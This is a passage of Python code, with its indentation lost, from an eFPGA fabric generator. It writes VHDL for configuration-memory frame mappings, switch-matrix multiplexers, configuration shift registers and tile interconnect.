else:
one_line.append(str(BitsLeftToPackInFrames))
# generate a string encoding a '1' for each flop used
# this will allow us to kick out flops in the middle (e.g. for alignment padding)
FrameBitsMask = ('1' * BitsLeftToPackInFrames + '0' * (FrameBitsPerRow-BitsLeftToPackInFrames))
tmp_one_line = ''
for k in range(len(FrameBitsMask)):
tmp_one_line = tmp_one_line + FrameBitsMask[k]
if ((k%4)==3) and (k != (len(FrameBitsMask)-1)): # after every 4th character add a '_'
tmp_one_line = tmp_one_line + '_' # some "pretty" printing, results in '1111_1111_1...'
one_line.append(tmp_one_line)
if BitsLeftToPackInFrames > 0:
one_line.append(str(BitsLeftToPackInFrames-1)+':0')
else:
one_line.append('# NULL')
BitsLeftToPackInFrames = 0; # will have to be 0 if already 0 or if we just allocate the last bits
# The mapping into frames is described as a list of index ranges applied to the ConfigBits vector
# use '2' for a single bit; '5:0' for a downto range; multiple ranges can be specified in optional consecutive comma separated fields get concatenated)
# default is counting top down
# attach line to CSV
initCSV.append(one_line)
tmp = numpy.asarray(initCSV)
numpy.savetxt(entity+'.init.csv', tmp, fmt='%s', delimiter=",")
return initCSV
def GenerateConfigMemVHDL( tile_description, entity, file ):
# count total number of configuration bits for tile
GlobalConfigBitsCounter = 0
for line in tile_description:
if (line[0] == 'BEL') or (line[0] == 'MATRIX'):
if (GetNoConfigBitsFromFile(line[VHDL_file_position])) != 'NULL':
GlobalConfigBitsCounter = GlobalConfigBitsCounter + int(GetNoConfigBitsFromFile(line[VHDL_file_position]))
# we use a file to describe the exact configuration bits to frame mapping
# the following command generates an init file with a simple enumerated default mapping (e.g. 'LUT4AB_ConfigMem.init.csv')
# if we run this function again, but have such a file (without the .init), then that mapping will be used
MappingFile = GenerateConfigMemInit( tile_description, entity, file, GlobalConfigBitsCounter )
# test if we have a bitstream mapping file
# if not, we will take the default, which was passed on from GenerateConfigMemInit
if os.path.exists(entity+'.csv'):
print('# found bitstream mapping file '+entity+'.csv'+' for tile '+tile_description[0][0])
MappingFile = [i.strip('\n').split(',') for i in open(entity+'.csv')]
# clean comments empty lines etc. in the mapping file
MappingFile = RemoveComments(MappingFile)
# clean the '_' symbols in the used_bits_mask field (had been introduced to allow for making that a little more readable
for line in MappingFile:
# TODO does not like white spaces tabs etc
# print('DEBUG BEFORE line[used_bits_mask]:',entity ,line[frame_name] ,line[used_bits_mask])
line[used_bits_mask] = re.sub('_', '', line[used_bits_mask])
# print('DEBUG AFTER line[used_bits_mask]:',entity ,line[frame_name] ,line[used_bits_mask])
# we should have as many lines as we have frames (=MaxFramesPerCol)
if str(len(MappingFile)) != str(MaxFramesPerCol):
print('WARNING: the bitstream mapping file has only '+str(len(MappingFile))+' entries but MaxFramesPerCol is '+str(MaxFramesPerCol))
# we should have as many lines as we have frames (=MaxFramesPerCol)
# we also check used_bits_mask (is a vector that is as long as a frame and contains a '1' for a bit used and a '0' if not used (padded)
UsedBitsCounter = 0
for line in MappingFile:
if line[used_bits_mask].count('1') > FrameBitsPerRow:
raise ValueError('bitstream mapping file '+entity+'.csv has to many 1-elements in bitmask for frame : '+line[frame_name])
if (line[used_bits_mask].count('1') + line[used_bits_mask].count('0')) != FrameBitsPerRow:
# print('DEBUG LINE: ', line)
raise ValueError('bitstream mapping file '+entity+'.csv has a too long or short bitmask for frame : '+line[frame_name])
# we also count the used bits over all frames
UsedBitsCounter += line[used_bits_mask].count('1')
if UsedBitsCounter != GlobalConfigBitsCounter:
raise ValueError('bitstream mapping file '+entity+'.csv has a bitmask missmatch; bitmask has in total '+str(UsedBitsCounter)+' 1-values for '+str(GlobalConfigBitsCounter)+' bits')
# write entity
# write entity
# write entity
GenerateVHDL_Header(file, entity, package=Package, NoConfigBits=str(GlobalConfigBitsCounter), MaxFramesPerCol=str(MaxFramesPerCol), FrameBitsPerRow=str(FrameBitsPerRow))
# the port definitions are generic
print('\t\t FrameData: in STD_LOGIC_VECTOR( FrameBitsPerRow -1 downto 0 );', file=file)
print('\t\t FrameStrobe: in STD_LOGIC_VECTOR( MaxFramesPerCol -1 downto 0 );', file=file)
print('\t\t ConfigBits : out STD_LOGIC_VECTOR( NoConfigBits -1 downto 0 )', file=file)
print('\t\t );', file=file)
print('end entity;\n', file=file)
# declare architecture
print('architecture Behavioral of '+str(entity)+' is\n', file=file)
# one_line('frame_name')('frame_index')('bits_used_in_frame')('used_bits_mask')('ConfigBits_ranges')
# frame signal declaration ONLY for the bits actually used
UsedFrames = [] # keeps track about the frames that are actually used
AllConfigBitsOrder = [] # stores a list of ConfigBits indices in exactly the order defined in the rage statements in the frames
for line in MappingFile:
bits_used_in_frame = line[used_bits_mask].count('1')
if bits_used_in_frame > 0:
print('signal '+line[frame_name]+' \t:\t STD_LOGIC_VECTOR( '+str(bits_used_in_frame)+' -1 downto 0);', file=file)
UsedFrames.append(line[frame_index])
# The actual ConfigBits are given as address ranges starting at position ConfigBits_ranges
ConfigBitsOrder = []
for RangeItem in line[ConfigBits_ranges:]:
if ':' in RangeItem: # we have a range
left, right = re.split(':',RangeItem)
left = int(left)
right = int(right)
if left < right:
step = 1
else:
step = -1
right += step # this makes the python range inclusive, otherwise the last item (which is actually right) would be missing
for k in range(left,right,step):
if k in ConfigBitsOrder:
raise ValueError('Configuration bit index '+str(k)+' already allocated in ', entity, line[frame_name])
else:
ConfigBitsOrder.append(int(k))
elif RangeItem.isdigit():
if int(RangeItem) in ConfigBitsOrder:
raise ValueError('Configuration bit index '+str(RangeItem)+' already allocated in ', entity, line[frame_name])
else:
ConfigBitsOrder.append(int(RangeItem))
else:
# raise ValueError('Range '+str(RangeItem)+' cannot be resolved for frame : '+line[frame_name])
print('Range '+str(RangeItem)+' cannot be resolved for frame : '+line[frame_name])
print('DEBUG:',line)
if len(ConfigBitsOrder) != bits_used_in_frame:
raise ValueError('ConfigBitsOrder definition misssmatch: number of 1s in mask do not match ConfigBits_ranges for frame : '+line[frame_name])
AllConfigBitsOrder += ConfigBitsOrder
# begin architecture body
print('\nbegin\n' , file=file)
# instantiate latches for only the used frame bits
print('-- instantiate frame latches' , file=file)
AllConfigBitsCounter = 0
for frame in UsedFrames:
used_bits = MappingFile[int(frame)][int(used_bits_mask)]
# print('DEBUG: ',entity, used_bits,' : ',AllConfigBitsOrder)
for k in range(FrameBitsPerRow):
# print('DEBUG: ',entity, used_bits,' : ',k, used_bits[k],'AllConfigBitsCounter',AllConfigBitsCounter, str(AllConfigBitsOrder[AllConfigBitsCounter]))
if used_bits[k] == '1':
print('Inst_'+MappingFile[int(frame)][int(frame_name)]+'_bit'+str(FrameBitsPerRow-1-k)+' : LHQD1' , file=file)
print('Port Map (' , file=file)
# The next one is a little tricky:
# k iterates over the bit_mask left to right from k=0..(FrameBitsPerRow-1) (k=0 is the most left (=first) character
# But that character represents the MSB inside the frame, which iterates FrameBitsPerRow-1..0
# bit_mask[0], bit_mask[1], bit_mask[2], ...
# FrameData[FrameBitsPerRow-1-0], FrameData[FrameBitsPerRow-1-1], FrameData[FrameBitsPerRow-1-2],
print('\t D \t=>\t FrameData('+str(FrameBitsPerRow-1-k)+'), ' , file=file)
print('\t E \t=>\t FrameStrobe('+str(frame)+'), ' , file=file)
print('\t Q \t=>\t ConfigBits ('+str(AllConfigBitsOrder[AllConfigBitsCounter])+') ); \n ' , file=file)
AllConfigBitsCounter += 1
print('\nend architecture;\n' , file=file)
return
def PrintCSV_FileInfo( CSV_FileName ):
CSVFile = [i.strip('\n').split(',') for i in open(CSV_FileName)]
print('Tile: ', str(CSVFile[0][0]), '\n')
# print('DEBUG:',CSVFile)
print('\nInputs: \n')
CSVFileRows=len(CSVFile)
# for port in CSVFile[0][1:]:
line = CSVFile[0]
for k in range(1,len(line)):
PortList = []
PortCount = 0
for j in range(1,len(CSVFile)):
if CSVFile[j][k] != '0':
PortList.append(CSVFile[j][0])
PortCount += 1
print(line[k], ' connects to ',PortCount,' ports: ', PortList)
print('\nOutputs: \n')
for line in CSVFile[1:]:
# we first count the number of multiplexer inputs
mux_size = 0
PortList = []
# for port in line[1:]:
# if port != '0':
for k in range(1,len(line)):
if line[k] != '0':
mux_size += 1
PortList.append(CSVFile[0][k])
print(line[0],',',str(mux_size),', Source port list: ', PortList)
return
def GenTileSwitchMatrixVHDL( tile, CSV_FileName, file ):
print('### Read ',str(tile),' csv file ###')
CSVFile = [i.strip('\n').split(',') for i in open(CSV_FileName)]
# clean comments empty lines etc. in the mapping file
CSVFile = RemoveComments(CSVFile)
# sanity check if we have the right CSV file
if tile != CSVFile[0][0]:
raise ValueError('top left element in CSV file does not match tile type in function GenTileSwitchMatrixVHDL')
# we check if all columns contain at least one entry
# basically that a wire entering the switch matrix can also leave that switch matrix.
# When generating the actual multiplexers, we run the same test on the rows...
for x in range(1,len(CSVFile[0])):
ColBitCounter = 0
for y in range(1,len(CSVFile)):
if CSVFile[y][x] == '1': # column-by-column scan
ColBitCounter += 1
if ColBitCounter == 0: # if we never counted, it may point to a problem
print('WARNING: input port '+CSVFile[0][x]+' of switch matrix in Tile '+CSVFile[0][0]+' is not used (from function GenTileSwitchMatrixVHDL)')
# we pass the NumberOfConfigBits as a comment in the beginning of the file.
# This simplifies it to generate the configuration port only if needed later when building the fabric where we are only working with the VHDL files
GlobalConfigBitsCounter = 0
mux_size_list = []
for line in CSVFile[1:]:
# we first count the number of multiplexer inputs
mux_size=0
for port in line[1:]:
if port != '0':
mux_size += 1
mux_size_list.append(mux_size)
if mux_size >= 2:
GlobalConfigBitsCounter = GlobalConfigBitsCounter + int(math.ceil(math.log2(mux_size)))
print('-- NumberOfConfigBits:'+str(GlobalConfigBitsCounter), file=file)
# VHDL header
entity = tile+'_switch_matrix'
GenerateVHDL_Header(file, entity, package=Package, NoConfigBits=str(GlobalConfigBitsCounter))
# input ports
print('\t\t -- switch matrix inputs', file=file)
# CSVFile[0][1:]: starts in the first row from the second element
for port in CSVFile[0][1:]:
# the following conditional is used to capture GND and VDD to not sow up in the switch matrix port list
if re.search('^GND', port, flags=re.IGNORECASE) or re.search('^VCC', port, flags=re.IGNORECASE) or re.search('^VDD', port, flags=re.IGNORECASE):
pass # maybe needed one day
else:
print('\t\t ',port,'\t: in \t STD_LOGIC;', file=file)
# output ports
for line in CSVFile[1:]:
print('\t\t ',line[0],'\t: out \t STD_LOGIC;', file=file)
# this is a shared text block finishes the header and adds configuration port
if GlobalConfigBitsCounter > 0:
GenerateVHDL_EntityFooter(file, entity, ConfigPort=True)
else:
GenerateVHDL_EntityFooter(file, entity, ConfigPort=False)
# constant declaration
# we may use the following in the switch matrix for providing '0' and '1' to a mux input:
print('constant GND0\t : std_logic := \'0\';', file=file)
print('constant GND\t : std_logic := \'0\';', file=file)
print('constant VCC0\t : std_logic := \'1\';', file=file)
print('constant VCC\t : std_logic := \'1\';', file=file)
print('constant VDD0\t : std_logic := \'1\';', file=file)
print('constant VDD\t : std_logic := \'1\';', file=file)
print('\t', file=file)
# signal declaration
for k in range(1,len(CSVFile),1):
print('signal \t ',CSVFile[k][0]+'_input','\t:\t std_logic_vector(',str(mux_size_list[k-1]),'- 1 downto 0 );', file=file)
### SwitchMatrixDebugSignals ### SwitchMatrixDebugSignals ###
### SwitchMatrixDebugSignals ### SwitchMatrixDebugSignals ###
if SwitchMatrixDebugSignals == True:
print('', file=file)
for line in CSVFile[1:]:
# we first count the number of multiplexer inputs
mux_size=0
for port in line[1:]:
if port != '0':
mux_size += 1
if mux_size >= 2:
print('signal DEBUG_select_'+str(line[0])+'\t: STD_LOGIC_VECTOR ('+str(int(math.ceil(math.log2(mux_size))))+' -1 downto 0);' , file=file)
### SwitchMatrixDebugSignals ### SwitchMatrixDebugSignals ###
### SwitchMatrixDebugSignals ### SwitchMatrixDebugSignals ###
# print('debug', file=file)
#
# mux_size_list = []
# ConfigBitsCounter = 0
# for line in CSVFile[1:]:
# # we first count the number of multiplexer inputs
# mux_size=0
# for port in line[1:]:
# # print('debug: ',port)
# if port != '0':
# mux_size += 1
# mux_size_list.append(mux_size)
# if mux_size >= 2:
# print('signal \t ',line[0]+'_input','\t:\t std_logic_vector(',str(mux_size),'- 1 downto 0 );', file=file)
# # "mux_size" tells us the number of mux inputs and "int(math.ceil(math.log2(mux_size)))" the number of configuration bits
# # we count all bits needed to declare a corresponding shift register
# ConfigBitsCounter = ConfigBitsCounter + int(math.ceil(math.log2(mux_size)))
print('\n-- The configuration bits (if any) are just a long shift register', file=file)
print('\n-- This shift register is padded to an even number of flops/latches', file=file)
# we are only generate configuration bits, if we really need configurations bits
# for example in terminating switch matrices at the fabric borders, we may just change direction without any switching
if GlobalConfigBitsCounter > 0:
if ConfigBitMode == 'ff_chain':
print('signal \t ConfigBits :\t unsigned( '+str(GlobalConfigBitsCounter)+'-1 downto 0 );', file=file)
if ConfigBitMode == 'FlipFlopChain':
# print('DEBUG DEBUG DEBUG DEBUG DEBUG DEBUG DEBUG DEBUG ConfigBitMode == FlipFlopChain')
# we pad to an even number of bits: (int(math.ceil(ConfigBitCounter/2.0))*2)
print('signal \t ConfigBits :\t unsigned( '+str(int(math.ceil(GlobalConfigBitsCounter/2.0))*2)+'-1 downto 0 );', file=file)
print('signal \t ConfigBitsInput :\t unsigned( '+str(int(math.ceil(GlobalConfigBitsCounter/2.0))*2)+'-1 downto 0 );', file=file)
# begin architecture
print('\nbegin\n', file=file)
# the configuration bits shift register
# again, we add this only if needed
if GlobalConfigBitsCounter > 0:
if ConfigBitMode == 'ff_chain':
print( '-- the configuration bits shift register ' , file=file)
print( 'process(CLK) ' , file=file)
print( 'begin ' , file=file)
print( '\t'+ 'if CLK\'event and CLK=\'1\' then ' , file=file)
print( '\t'+'\t'+ 'if mode=\'1\' then --configuration mode ' , file=file)
print( '\t'+'\t'+'\t'+ 'ConfigBits <= CONFin & ConfigBits(ConfigBits\'high downto 1); ' , file=file)
print( '\t'+'\t'+ 'end if; ' , file=file)
print( '\t'+ 'end if; ' , file=file)
print( 'end process; ' , file=file)
print( 'CONFout <= ConfigBits(ConfigBits\'high); ' , file=file)
print(' \n' , file=file)
# L:for k in 0 to 196 generate
# inst_LHQD1a : LHQD1
# Port Map(
# D => ConfigBitsInput(k*2),
# E => CLK,
# Q => ConfigBits(k*2) ) ;
# inst_LHQD1b : LHQD1
# Port Map(
# D => ConfigBitsInput((k*2)+1),
# E => MODE,
# Q => ConfigBits((k*2)+1) );
# end generate;
if ConfigBitMode == 'FlipFlopChain':
# print('DEBUG DEBUG DEBUG DEBUG DEBUG DEBUG DEBUG DEBUG ConfigBitMode == FlipFlopChain')
print( 'ConfigBitsInput <= ConfigBits(ConfigBitsInput\'high-1 downto 0) & CONFin; \n ' , file=file)
print( '-- for k in 0 to Conf/2 generate ' , file=file)
print( 'L: for k in 0 to '+str(int(math.ceil(GlobalConfigBitsCounter/2.0))-1)+' generate ' , file=file)
print( '\t'+ ' inst_LHQD1a : LHQD1 ' , file=file)
print( '\t'+ '\t'+ 'Port Map( ' , file=file)
print( '\t'+ '\t'+ 'D => ConfigBitsInput(k*2), ' , file=file)
print( '\t'+ '\t'+ 'E => CLK, ' , file=file)
print( '\t'+ '\t'+ 'Q => ConfigBits(k*2) ); ' , file=file)
print( ' ' , file=file)
print( '\t'+ ' inst_LHQD1b : LHQD1 ' , file=file)
print( '\t'+ '\t'+ 'Port Map( ' , file=file)
print( '\t'+ '\t'+ 'D => ConfigBitsInput((k*2)+1),' , file=file)
print( '\t'+ '\t'+ 'E => MODE,' , file=file)
print( '\t'+ '\t'+ 'Q => ConfigBits((k*2)+1) ); ' , file=file)
print( 'end generate; \n ' , file=file)
print('CONFout <= ConfigBits(ConfigBits\'high); ' , file=file)
print(' \n' , file=file)
# the switch matrix implementation
# we use the following variable to count the configuration bits of a long shift register which actually holds the switch matrix configuration
ConfigBitstreamPosition = 0
for line in CSVFile[1:]:
# we first count the number of multiplexer inputs
mux_size=0
for port in line[1:]:
# print('debug: ',port)
if port != '0':
mux_size += 1
print('-- switch matrix multiplexer ',line[0],'\t\tMUX-'+str(mux_size), file=file)
if mux_size == 0:
print('-- WARNING unused multiplexer MUX-'+str(line[0]), file=file)
print('WARNING: unused multiplexer MUX-'+str(line[0])+' in tile '+str(CSVFile[0][0]))
# just route through : can be used for auxiliary wires or diagonal routing (Manhattan, just go to a switch matrix when turning
# can also be used to tap a wire. A double with a mid is nothing else as a single cascaded with another single where the second single has only one '1' to cascade from the first single
if mux_size == 1:
port_index = 0
for port in line[1:]:
port_index += 1
if port == '1':
print(line[0],'\t <= \t', CSVFile[0][port_index],';', file=file)
elif port == 'l' or port == 'L' :
print(line[0],'\t <= \t \'0\';', file=file)
elif port == 'h' or port == 'H':
print(line[0],'\t <= \t \'1\';', file=file)
elif port == '0':
pass # we add this for the following test to throw an error is an unexpected character is used
else:
raise ValueError('wrong symbol in CSV file (must be 0, 1, H, or L) when executing function GenTileSwitchMatrixVHDL')
# this is the case for a configurable switch matrix multiplexer
if mux_size >= 2:
print(line[0]+'_input','\t <= ', end='', file=file)
port_index = 0
inputs_so_far = 0
# the reversed() changes the direction that we iterate over the line list.
# I changed it such that the left-most entry is located at the end of the concatenated vector for the multiplexing
# This was done such that the index from left-to-right in the adjacency matrix corresponds with the multiplexer select input (index)
# remove "len(line)-" if you remove the reversed(..)
for port in reversed(line[1:]):
port_index += 1
if port != '0':
inputs_so_far += 1
# again the "len(line)-" is needed as we iterate in reverse direction over the line list.
# remove "len(line)-" if you remove the reversed(..)
print(CSVFile[0][len(line)-port_index],end='', file=file)
if inputs_so_far == mux_size:
if int(GenerateDelayInSwitchMatrix) > 0:
print(' after '+str(GenerateDelayInSwitchMatrix)+' ps;', file=file)
else:
print(';', file=file)
else:
print(' & ',end='', file=file)
# int(math.ceil(math.log2(inputs_so_far))) tells us how many configuration bits a multiplexer takes
old_ConfigBitstreamPosition = ConfigBitstreamPosition
ConfigBitstreamPosition = ConfigBitstreamPosition + int(math.ceil(math.log2(inputs_so_far)))
# we have full custom MUX-4 and MUX-16 for which we have to generate code like:
# VHDL example custom MUX4
# inst_MUX4PTv4_J_l_AB_BEG1 : MUX4PTv4
# Port Map(
# IN1 => J_l_AB_BEG1_input(0),
# IN2 => J_l_AB_BEG1_input(1),
# IN3 => J_l_AB_BEG1_input(2),
# IN4 => J_l_AB_BEG1_input(3),
# S1 => ConfigBits(low_362),
# S2 => ConfigBits(low_362 + 1,
# O => J_l_AB_BEG1 );
# CUSTOM Multiplexers for switch matrix
# CUSTOM Multiplexers for switch matrix
# CUSTOM Multiplexers for switch matrix
if (MultiplexerStyle == 'custom') and (mux_size == 4):
MuxComponentName = 'MUX4PTv4'
if (MultiplexerStyle == 'custom') and (mux_size == 16):
MuxComponentName = 'MUX16PTv2'
if (MultiplexerStyle == 'custom') and (mux_size == 4 or mux_size == 16):
# inst_MUX4PTv4_J_l_AB_BEG1 : MUX4PTv4
print('inst_'+MuxComponentName+'_'+line[0]+' : '+MuxComponentName+'\n',end='', file=file)
# Port Map(
print('\t'+' Port Map(\n',end='', file=file)
# IN1 => J_l_AB_BEG1_input(0),
# IN2 => J_l_AB_BEG1_input(1), ...
for k in range(0,mux_size):
print('\t'+'\t'+'IN'+str(k+1)+' \t=> '+line[0]+'_input('+str(k)+'),\n',end='', file=file)
# S1 => ConfigBits(low_362),
# S2 => ConfigBits(low_362 + 1, ...
for k in range(0,(math.ceil(math.log2(mux_size)))):
print('\t'+'\t'+'S'+str(k+1)+' \t=> ConfigBits('+str(old_ConfigBitstreamPosition)+' + '+str(k)+'),\n',end='', file=file)
print('\t'+'\t'+'O \t=> '+line[0]+' );\n\n',end='', file=file)
else: # generic multiplexer
if MultiplexerStyle == 'custom':
print('HINT: creating a MUX-'+str(mux_size)+' for port '+line[0]+' in switch matrix for tile '+CSVFile[0][0])
# VHDL example arbitrary mux
# J_l_AB_BEG1 <= J_l_AB_BEG1_input(TO_INTEGER(ConfigBits(363 downto 362)));
print(line[0]+'\t<= '+line[0]+'_input(',end='', file=file)
print('TO_INTEGER(UNSIGNED(ConfigBits('+str(ConfigBitstreamPosition-1)+' downto '+str(old_ConfigBitstreamPosition)+'))));', file=file)
print(' ', file=file)
### SwitchMatrixDebugSignals ### SwitchMatrixDebugSignals ###
### SwitchMatrixDebugSignals ### SwitchMatrixDebugSignals ###
if SwitchMatrixDebugSignals == True:
print('\n', file=file)
ConfigBitstreamPosition = 0
for line in CSVFile[1:]:
# we first count the number of multiplexer inputs
mux_size=0
for port in line[1:]:
if port != '0':
mux_size += 1
if mux_size >= 2:
old_ConfigBitstreamPosition = ConfigBitstreamPosition
ConfigBitstreamPosition = ConfigBitstreamPosition + int(math.ceil(math.log2(mux_size)))
print('DEBUG_select_'+line[0]+'\t<= ConfigBits('+str(ConfigBitstreamPosition-1)+' downto '+str(old_ConfigBitstreamPosition)+');', file=file)
### SwitchMatrixDebugSignals ### SwitchMatrixDebugSignals ###
### SwitchMatrixDebugSignals ### SwitchMatrixDebugSignals ###
# just the final end of architecture
print('\n'+'end architecture Behavioral;'+'\n', file=file)
return
def GenerateFabricVHDL( FabricFile, file, entity = 'eFPGA' ):
# There are of course many possibilities for generating the fabric.
# I decided to generate a flat description as it may allow for a little easier debugging.
# For larger fabrics, this may be an issue, but not for now.
# We only have wires between two adjacent tiles in North, East, South, West direction.
# So we use the output ports to generate wires.
fabric = GetFabric(FabricFile)
y_tiles=len(fabric) # get the number of tiles in vertical direction
x_tiles=len(fabric[0]) # get the number of tiles in horizontal direction
TileTypes = GetCellTypes(fabric)
print('### Found the following tile types:\n',TileTypes)
# VHDL header
# entity hard-coded TODO
GenerateVHDL_Header(file, entity, MaxFramesPerCol=str(MaxFramesPerCol), FrameBitsPerRow=str(FrameBitsPerRow))
# we first scan all tiles if those have IOs that have to go to top
# the order of this scan is later maintained when instantiating the actual tiles
print('\t-- External IO ports exported directly from the corresponding tiles', file=file)
ExternalPorts = []
SharedExternalPorts = []
for y in range(y_tiles):
for x in range(x_tiles):
if (fabric[y][x]) != 'NULL':
# get the top dimension index that describes the tile type (given by fabric[y][x])
# for line in TileTypeOutputPorts[TileTypes.index(fabric[y][x])]:
CurrentTileExternalPorts = GetComponentPortsFromFile(fabric[y][x]+'_tile.vhdl', port='external')
if CurrentTileExternalPorts != []:
for item in CurrentTileExternalPorts:
# we need the PortName and the PortDefinition (everything after the ':' separately
PortName = re.sub('\:.*', '', item)
substitutions = {" ": "", "\t": ""}
PortName=(replace(PortName, substitutions))
PortDefinition = re.sub('^.*\:', '', item)
if re.search('SHARED_PORT', item):
# for the entity, we define only the very first for all SHARED_PORTs of any name category
if PortName not in SharedExternalPorts:
print('\t\t'+PortName+'\t:\t'+PortDefinition, file=file)
SharedExternalPorts.append(PortName)
# we remember the used port name for the component instantiations to come
# for the instantiations, we have to keep track about all external ports
ExternalPorts.append(PortName)
else:
print('\t\t'+'Tile_X'+str(x)+'Y'+str(y)+'_'+PortName+'\t:\t'+PortDefinition, file=file)
# we remember the used port name for the component instantiations to come
# we are maintaining the here used Tile_XxYy prefix as a sanity check
# ExternalPorts = ExternalPorts + 'Tile_X'+str(x)+'Y'+str(y)+'_'+str(PortName)
ExternalPorts.append('Tile_X'+str(x)+'Y'+str(y)+'_'+PortName)
if ConfigBitMode == 'frame_based':
print('\t\t FrameData: in STD_LOGIC_VECTOR( (FrameBitsPerRow * '+str(y_tiles)+') -1 downto 0 ); -- CONFIG_PORT this is a keyword needed to connect the tile to the bitstream frame register', file=file)
print('\t\t FrameStrobe: in STD_LOGIC_VECTOR( (MaxFramesPerCol * '+str(x_tiles)+') -1 downto 0 ); -- CONFIG_PORT this is a keyword needed to connect the tile to the bitstream frame register ', file=file)
GenerateVHDL_EntityFooter(file, entity, ConfigPort=False)
else:
GenerateVHDL_EntityFooter(file, entity)
TileTypeOutputPorts = []
for tile in TileTypes:
PrintComponentDeclarationForFile(str(tile)+'_tile.vhdl', file)
# we need the BEL ports (a little later)
Inputs, Outputs = GetComponentPortsFromFile(str(tile)+'_tile.vhdl')
TileTypeOutputPorts.append(Outputs)
# VHDL signal declarations
print('\n-- signal declarations\n', file=file)
print('\n-- configuration signal declarations\n', file=file)
if ConfigBitMode == 'FlipFlopChain':
tile_counter = 0
for y in range(y_tiles):
for x in range(x_tiles):
# for the moment, we assume that all non "NULL" tiles are reconfigurable
# (i.e. are connected to the configuration shift register)
if (fabric[y][x]) != 'NULL':
tile_counter += 1
print('signal\t'+'conf_data'+'\t:\tSTD_LOGIC_VECTOR('+str(tile_counter)+' downto 0);', file=file)
if ConfigBitMode == 'frame_based':
# for y in range(y_tiles):
# for x in range(x_tiles):
# if (fabric[y][x]) != 'NULL':
# TileConfigBits = GetNoConfigBitsFromFile(str(fabric[y][x])+'_tile.vhdl')
# if TileConfigBits != 'NULL' and int(TileConfigBits) != 0:
# print('signal Tile_X'+str(x)+'Y'+str(y)+'_ConfigBits \t:\t std_logic_vector('+TileConfigBits+' -1 downto '+str(0)+' );', file=file)
# FrameData => Tile_Y3_FrameData,
# FrameStrobe => Tile_X1_FrameStrobe
# MaxFramesPerCol : integer := 20;
# FrameBitsPerRow : integer := 32;
for y in range(y_tiles):
print('signal Tile_Y'+str(y)+'_FrameData \t:\t std_logic_vector(FrameBitsPerRow -1 downto 0);', file=file)
for x in range(x_tiles):
print('signal Tile_X'+str(x)+'_FrameStrobe \t:\t std_logic_vector(MaxFramesPerCol -1 downto 0);', file=file)
print('\n-- tile-to-tile signal declarations\n', file=file)
for y in range(y_tiles):
for x in range(x_tiles):
if (fabric[y][x]) != 'NULL':
# get the top dimension index that describes the tile type (given by fabric[y][x])
# for line in TileTypeOutputPorts[TileTypes.index(fabric[y][x])]:
# for line in TileTypeOutputPorts[TileTypes.index(fabric[y][x])]:
# for line in TileTypeOutputPorts[TileTypes.index(fabric[y][x])]:
for line in TileTypeOutputPorts[TileTypes.index(fabric[y][x])]:
# line contains something like "E2BEG : std_logic_vector( 7 downto 0 )" so I use split on '('
SignalName, Vector = re.split('\(',line)
# print('DEBUG line: ', line, file=file)
# print('DEBUG SignalName: ', SignalName, file=file)
# print('DEBUG Vector: ', Vector, file=file)
# Vector = re.sub('--.*', '', Vector)
print('signal Tile_X'+str(x)+'Y'+str(y)+'_'+SignalName+'\t:\t std_logic_vector('+Vector+';', file=file)
# VHDL architecture body
print('\nbegin\n', file=file)
# top configuration data daisy chaining
# this is copy and paste from tile code generation (so we can modify this here without side effects
if ConfigBitMode == 'FlipFlopChain':
print('-- top configuration data daisy chaining', file=file)
print('conf_data(conf_data\'low) <= CONFin; -- conf_data\'low=0 and CONFin is from tile entity', file=file)
print('CONFout <= conf_data(conf_data\'high); -- CONFout is from tile entity', file=file)
if ConfigBitMode == 'frame_based':
for y in range(y_tiles):
print('Tile_Y'+str(y)+'_FrameData \t<=\t FrameData((FrameBitsPerRow*('+str(y)+'+1)) -1 downto FrameBitsPerRow*'+str(y)+');', file=file)
for x in range(x_tiles):
print('Tile_X'+str(x)+'_FrameStrobe \t<=\t FrameStrobe((MaxFramesPerCol*('+str(x)+'+1)) -1 downto MaxFramesPerCol*'+str(x)+');', file=file)
# VHDL tile instantiations
tile_counter = 0
ExternalPorts_counter = 0
print('-- tile instantiations\n', file=file)
for y in range(y_tiles):
for x in range(x_tiles):
if (fabric[y][x]) != 'NULL':
EntityName = GetComponentEntityNameFromFile(str(fabric[y][x])+'_tile.vhdl')
print('Tile_X'+str(x)+'Y'+str(y)+'_'+EntityName+' : '+EntityName, file=file)
print('\tPort Map(', file=file)
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y][x])+'_tile.vhdl')
# print('DEBUG TileInputs: ', TileInputs)
# print('DEBUG TileOutputs: ', TileOutputs)
TilePorts = []
TilePortsDebug = []
# for connecting the instance, we write the tile ports in the order all inputs and all outputs
for port in TileInputs + TileOutputs:
# GetComponentPortsFromFile returns vector information that starts with "(..." and we throw that away
# However the vector information is still interesting for debug purpose
TilePorts.append(re.sub(' ','',(re.sub('\(.*', '', port, flags=re.IGNORECASE))))
TilePortsDebug.append(port)
# now we get the connecting input signals in the order NORTH EAST SOUTH WEST (order is given in fabric.csv)
# from the adjacent tiles. For example, a NorthEnd-port is connected to a SouthBeg-port on tile Y+1
# note that fabric[y][x] has its origin [0][0] in the top left corner
TileInputSignal = []
TileInputSignalCountPerDirection = []
# IMPORTANT: we have to go through the following in NORTH EAST SOUTH WEST order
# NORTH direction: get the NiBEG wires from tile y+1, because they drive NiEND
if y < (y_tiles-1):
if (fabric[y+1][x]) != 'NULL':
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y+1][x])+'_tile.vhdl', filter='NORTH')
for port in TileOutputs:
TileInputSignal.append('Tile_X'+str(x)+'Y'+str(y+1)+'_'+port)
if TileOutputs == []:
TileInputSignalCountPerDirection.append(0)
else:
TileInputSignalCountPerDirection.append(len(TileOutputs))
else:
TileInputSignalCountPerDirection.append(0)
else:
TileInputSignalCountPerDirection.append(0)
# EAST direction: get the EiBEG wires from tile x-1, because they drive EiEND
if x > 0:
if (fabric[y][x-1]) != 'NULL':
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y][x-1])+'_tile.vhdl', filter='EAST')
for port in TileOutputs:
TileInputSignal.append('Tile_X'+str(x-1)+'Y'+str(y)+'_'+port)
if TileOutputs == []:
TileInputSignalCountPerDirection.append(0)
else:
TileInputSignalCountPerDirection.append(len(TileOutputs))
else:
TileInputSignalCountPerDirection.append(0)
else:
TileInputSignalCountPerDirection.append(0)
# SOUTH direction: get the SiBEG wires from tile y-1, because they drive SiEND
if y > 0:
if (fabric[y-1][x]) != 'NULL':
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y-1][x])+'_tile.vhdl', filter='SOUTH')
for port in TileOutputs:
